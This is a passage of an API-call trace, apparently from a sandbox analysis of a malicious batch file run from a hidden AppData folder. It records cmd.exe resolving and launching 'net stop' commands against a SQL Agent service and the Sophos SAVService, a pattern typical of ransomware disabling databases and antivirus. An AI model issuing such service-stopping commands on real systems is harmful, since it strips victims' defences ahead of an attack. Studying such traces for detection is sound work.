[0038.998] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0038.998] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0038.998] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0038.998] _wcsicmp (_String1="net", _String2="MD") returned 1 [0038.998] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0038.998] _wcsicmp (_String1="net", _String2="RD") returned -4 [0038.998] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0038.998] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0038.998] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0038.998] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0038.999] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0038.999] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0038.999] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0038.999] _wcsicmp (_String1="net", _String2="VER") returned -8 [0038.999] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0038.999] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0038.999] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0038.999] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0038.999] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0038.999] _wcsicmp (_String1="net", _String2="START") returned -5 [0038.999] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0038.999] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0038.999] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0038.999] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0038.999] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0038.999] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0038.999] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0038.999] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0038.999] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0038.999] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0038.999] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0038.999] SetErrorMode (uMode=0x0) returned 0x1 [0038.999] GetProcessHeap () returned 0x3e0000 [0038.999] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0038.999] GetProcessHeap () returned 0x3e0000 [0038.999] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0038.999] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.999] GetProcessHeap () returned 0x3e0000 [0038.999] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0038.999] GetProcessHeap () returned 0x3e0000 [0038.999] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0039.000] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0039.000] GetProcessHeap () returned 0x3e0000 [0039.000] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0039.000] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.000] GetProcessHeap () returned 0x3e0000 [0039.000] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0039.000] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0039.000] GetProcessHeap () returned 0x3e0000 [0039.000] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0039.000] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.000] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.000] GetLastError () returned 0x2 [0039.000] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.000] GetLastError () returned 0x2 [0039.000] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.000] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.000] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.000] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.001] GetLastError () returned 0x2 [0039.001] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.001] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.001] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.001] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0039.001] SetErrorMode (uMode=0x0) returned 0x1 [0039.001] GetProcessHeap () returned 0x3e0000 [0039.001] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0039.001] GetProcessHeap () returned 0x3e0000 [0039.001] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0039.001] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.001] GetProcessHeap () returned 0x3e0000 [0039.001] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0039.001] GetProcessHeap () returned 0x3e0000 [0039.001] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0039.001] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0039.001] GetProcessHeap () returned 0x3e0000 [0039.001] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0039.001] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.001] GetProcessHeap () returned 0x3e0000 [0039.001] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0039.001] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0039.002] GetProcessHeap () returned 0x3e0000 [0039.002] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0039.002] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.002] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.002] GetLastError () returned 0x2 [0039.002] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.002] GetLastError () returned 0x2 [0039.002] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.002] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0039.002] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0039.002] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.002] GetLastError () returned 0x2 [0039.002] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0039.002] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0039.003] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.003] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0039.003] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0039.003] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0039.003] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0039.003] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$PROFXENGAGEMENT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$PROFXENGAGEMENT /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$PROFXENGAGEMENT /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xbd4, dwThreadId=0xbd8)) returned 1 [0039.007] CloseHandle (hObject=0x74) returned 1 [0039.007] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0039.007] GetProcessHeap () returned 0x3e0000 [0039.007] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.007] GetEnvironmentStringsW () returned 0x3f8408* [0039.007] GetProcessHeap () returned 0x3e0000 [0039.007] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.007] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.007] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0039.161] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0039.161] CloseHandle (hObject=0x78) returned 1 [0039.161] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0039.161] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0039.161] GetProcessHeap () returned 0x3e0000 [0039.161] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.161] GetEnvironmentStringsW () returned 0x3f8408* [0039.161] GetProcessHeap () returned 0x3e0000 [0039.161] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.161] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.162] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0039.162] GetProcessHeap () returned 0x3e0000 [0039.162] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.162] GetEnvironmentStringsW () returned 0x3f8408* [0039.162] GetProcessHeap () returned 0x3e0000 [0039.162] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.162] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.162] GetProcessHeap () returned 0x3e0000 [0039.162] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0039.162] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0039.162] _get_osfhandle (_FileHandle=1) returned 0x264 [0039.162] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0039.162] _get_osfhandle (_FileHandle=1) returned 0x264 [0039.162] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0039.162] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0039.162] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0039.162] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0039.162] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0039.163] SetConsoleInputExeNameW () returned 0x1 [0039.163] GetConsoleOutputCP () returned 0x1b5 [0039.163] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0039.163] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.163] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0039.163] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0039.163] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.163] SetFilePointer (in: hFile=0x78, lDistanceToMove=1290, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x50a [0039.163] GetProcessHeap () returned 0x3e0000 [0039.163] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0039.163] GetProcessHeap () returned 0x3e0000 [0039.163] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0039.163] GetProcessHeap () returned 0x3e0000 [0039.163] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0039.163] GetProcessHeap () returned 0x3e0000 [0039.163] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0039.163] GetProcessHeap () returned 0x3e0000 [0039.163] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0039.163] GetProcessHeap () returned 0x3e0000 [0039.163] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0039.164] GetProcessHeap () returned 0x3e0000 [0039.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0039.164] GetProcessHeap () returned 0x3e0000 [0039.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0039.164] GetProcessHeap () returned 0x3e0000 [0039.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0039.164] GetProcessHeap () returned 0x3e0000 [0039.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0039.164] GetProcessHeap () returned 0x3e0000 [0039.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0039.164] GetProcessHeap () returned 0x3e0000 [0039.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0039.164] GetProcessHeap () returned 0x3e0000 [0039.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0039.164] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.164] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x50a [0039.164] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x13b7, lpOverlapped=0x0) returned 1 [0039.164] SetFilePointer (in: hFile=0x78, lDistanceToMove=1314, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x522 [0039.164] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=24, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SAVService /y\r\nNGAGEMENT /y\r\nerviceΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 24 [0039.164] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.164] GetFileType (hFile=0x78) returned 0x1 [0039.164] _get_osfhandle (_FileHandle=3) returned 0x78 [0039.164] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x522 [0039.164] GetProcessHeap () returned 0x3e0000 [0039.164] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fcad8 [0039.164] GetProcessHeap () returned 0x3e0000 [0039.164] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcad8 | out: hHeap=0x3e0000) returned 1 [0039.165] _tell (_FileHandle=3) returned 1314 [0039.165] _close (_FileHandle=3) returned 0 [0039.165] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0039.165] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0039.165] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0039.165] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0039.165] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0039.165] _wcsicmp (_String1="net", _String2="CD") returned 11 [0039.165] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0039.165] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0039.165] _wcsicmp (_String1="net", _String2="REN") returned -4 [0039.165] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0039.165] _wcsicmp (_String1="net", _String2="SET") returned -5 [0039.165] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0039.165] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0039.165] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0039.165] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0039.165] _wcsicmp (_String1="net", _String2="MD") returned 1 [0039.165] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0039.165] _wcsicmp (_String1="net", _String2="RD") returned -4 [0039.166] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0039.166] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0039.166] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0039.166] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0039.166] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0039.166] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0039.166] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0039.166] _wcsicmp (_String1="net", _String2="VER") returned -8 [0039.166] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0039.166] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0039.166] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0039.166] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0039.166] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0039.166] _wcsicmp (_String1="net", _String2="START") returned -5 [0039.166] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0039.166] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0039.166] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0039.166] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0039.166] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0039.166] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0039.166] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0039.166] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0039.166] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0039.166] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0039.166] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0039.166] SetErrorMode (uMode=0x0) returned 0x1 [0039.166] GetProcessHeap () returned 0x3e0000 [0039.166] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0039.167] GetProcessHeap () returned 0x3e0000 [0039.167] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0039.167] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.167] GetProcessHeap () returned 0x3e0000 [0039.167] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0039.167] GetProcessHeap () returned 0x3e0000 [0039.167] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0039.167] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0039.167] GetProcessHeap () returned 0x3e0000 [0039.167] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0039.167] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.167] GetProcessHeap () returned 0x3e0000 [0039.167] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0039.167] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0039.167] GetProcessHeap () returned 0x3e0000 [0039.167] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0039.167] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.167] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.167] GetLastError () returned 0x2 [0039.167] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.167] GetLastError () returned 0x2 [0039.167] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.167] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.168] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.168] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.168] GetLastError () returned 0x2 [0039.168] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.168] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.168] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.168] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0039.168] SetErrorMode (uMode=0x0) returned 0x1 [0039.168] GetProcessHeap () returned 0x3e0000 [0039.168] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0039.168] GetProcessHeap () returned 0x3e0000 [0039.168] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0039.168] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.168] GetProcessHeap () returned 0x3e0000 [0039.168] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0039.168] GetProcessHeap () returned 0x3e0000 [0039.168] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0039.168] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0039.168] GetProcessHeap () returned 0x3e0000 [0039.168] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0039.169] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: 